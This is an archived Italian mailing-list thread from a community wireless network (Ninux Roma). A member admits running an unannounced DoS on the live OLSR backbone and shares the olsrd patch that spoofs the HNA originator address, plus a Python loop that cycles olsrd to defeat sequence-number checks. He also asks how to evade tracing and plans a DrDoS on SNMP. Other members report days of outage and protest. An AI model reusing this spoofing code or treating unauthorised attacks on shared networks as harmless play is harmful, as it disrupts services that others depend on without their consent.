[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

OCBexpress (Valer;o) ocbexpress a gmail.com
Dom 25 Maggio 2014 09:57:34 CEST


Condannatelo ad una settimana di "palo umano" per supernode..
Aspetterei il caldo di Agosto e documenterei il tutto con una camera remota
;)

--
Valer;o)
E-mail: ocbexpress a gmail.com
GoogleTalk: ocbexpress a gmail.com
VoIP: 5339244 a sip.messagenet.it


Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
andrea.pescetelli a gmail.com> ha scritto:

> Ciao
> Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi
> e comportamenti che da una settimana stanno invalidando sia il rispetto
> reciproco sia il buon finzionamento della rete stessa da parte di Saverio
> Proto.
> Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessandro a gnagni.it> ha
> scritto:
>
>>  Non è qualche ora. Va avanti da giovedì mattina.
>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>> Jabber è stato ko da giovedì per sta cosa.
>> Il 25/mag/2014 01:03 "Saverio Proto" <zioproto a gmail.com> ha scritto:
>>
>>> Ciao,
>>>
>>> Metto in Cc: anche wireless a ml.ninux.org perché questa email contiene
>>> informazioni tecniche interessanti.
>>>
>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>
>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>
>>> diff --git a/src/build_msg.c b/src/build_msg.c
>>> index 109f955..e252981 100644
>>> --- a/src/build_msg.c
>>> +++ b/src/build_msg.c
>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>>    m = (union olsr_message *)msg_buffer;
>>>
>>>    /* Fill header */
>>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>> +  struct in_addr fakesource;
>>> +  fakesource.s_addr = 0;
>>> +  //inet_hton(2956867021,&fakesource);
>>> +  inet_aton("172.16.40.40",&fakesource);
>>> +  m->v4.originator = fakesource.s_addr;
>>>    m->v4.hopcnt = 0;
>>>    m->v4.ttl = MAX_TTL;
>>>    m->v4.olsr_msgtype = HNA_MESSAGE;
>>>
>>>
>>> una domanda,
>>>
>>> se avessi patchato anche:
>>>
>>> m->v4.hopcnt = XXX
>>>
>>> mettendo numeri casuali..
>>>
>>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>>> messaggi ?
>>>
>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>> che vorrei provare è DrDoS su snmp).
>>>
>>> un problema di questo attacco sono cmq i sequence number. Per rendere
>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>> OLSR a singhiozzo:
>>>
>>> import os
>>> import time
>>>
>>> while True:
>>>         os.system("olsrd")
>>>         print "started\n"
>>>         time.sleep(120)
>>>         os.system("killall olsrd")
>>>         print "killed\n"
>>>         time.sleep(300)
>>>
>>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>> come out of sequence.
>>>
>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>> parte di come ti costruisce l'attacco e voi la parte di come avete
>>> fatto ad identificare il nodo spoofato ?
>>>
>>> ho staccatto il nodo attaccante, il gioco è finito :)
>>>
>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>>
>>> ciao :)
>>>
>>> Saverio
>>>
>>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>> <andrea.pescetelli a gmail.com> ha scritto:
>>> > Saverio,
>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr
>>> hna
>>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>> > proveniente dal nodo in oggetto.
>>> >
>>> > Questo problema sta oscurando diversi servizi di ninux in farm
>>> appartenenti
>>> > a quella subnet.
>>> >
>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>>> > multipli.
>>> > puoi verificare?
>>> >
>>> > Grazie
>>> >
>>> > Fish, Hispanico, Halino
>>> > --
>>> > Andrea Pescetelli aka Fish
>>> > Skype: andrea5742
>>> > Ninux int: 5001/5002
>>> > Mobile: +39 3891156050
>>> >
>>> >
>>> >
>>> >
>>>
>>
>> _______________________________________________
>> Wireless mailing list
>> Wireless a ml.ninux.org
>> http://ml.ninux.org/mailman/listinfo/wireless
>>
>>
> _______________________________________________
> Wireless mailing list
> Wireless a ml.ninux.org
> http://ml.ninux.org/mailman/listinfo/wireless
>
>
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/7372772e/attachment-0001.html>


Maggiori informazioni sulla lista Wireless